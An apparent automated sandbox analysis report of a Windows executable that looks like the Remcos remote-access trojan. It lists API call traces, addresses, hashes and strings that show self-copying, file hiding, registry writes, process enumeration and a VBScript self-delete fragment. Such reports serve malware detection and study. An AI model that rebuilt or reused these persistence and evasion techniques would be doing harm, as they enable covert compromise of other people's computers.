                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                          • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                          • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
                                          • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                        • wcslen.MSVCRT ref: 004090DB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                          • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                          • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                          • Part of subcall function 00407E37: CreateDirectoryW.KERNELBASE(00000000), ref: 00407E64
                                          • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                          • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                          • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                          • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                          • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                          • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                          • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                          • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                        • wcscpy.MSVCRT ref: 00409230
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                          • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                          • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                        • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                          • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                          • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                          • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                          • Part of subcall function 0040B708: RegSetValueExA.ADVAPI32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                          • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                          • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                        • atoi.MSVCRT ref: 00409391
                                        • CreateThread.KERNEL32(00000000,00000000,00413B0F,00000000,00000000,00000000), ref: 004093C0
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                        • atoi.MSVCRT ref: 00409540
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                          • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                          • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                          • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                          • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                          • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                          • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                          • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                          • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                          • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                          • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                          • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                          • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                          • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                          • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                        • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                        • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                        • API String ID: 1672879135-3082139352
                                        • Opcode ID: f0ed40f161cef62a835146acbcaa0afe53166bc10613c5bca7ddc65cbc1d354f
                                        • Instruction ID: 756b6b72303f02f0a44bbd524559c36dcc88ee27c0131fa1ad94d22a553bdc8a
                                        • Opcode Fuzzy Hash: f0ed40f161cef62a835146acbcaa0afe53166bc10613c5bca7ddc65cbc1d354f
                                        • Instruction Fuzzy Hash: 5862C572A00648EBDB057BB0AC599FE3B29EB84305F04447EF502A72D2DF784D458B6C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00407E37, Relevance: 142.1, APIs: 70, Strings: 11, Instructions: 326fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wcslen.MSVCRT ref: 00407E46
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                        • CreateDirectoryW.KERNELBASE(00000000), ref: 00407E64
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                        • wcscmp.MSVCRT ref: 00407EE0
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                        • CopyFileW.KERNELBASE(C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,00000000), ref: 00407F25
                                        • wcslen.MSVCRT ref: 00407F40
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,00000000), ref: 00407FC6
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407FD3
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                        • SetFileAttributesW.KERNELBASE(00000000), ref: 0040801D
                                        • wcslen.MSVCRT ref: 00408022
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                        • SetFileAttributesW.KERNELBASE(00000000), ref: 0040803B
                                        • _wgetenv.MSVCRT ref: 0040804B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,?,00415628,0041623C), ref: 004080B0
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
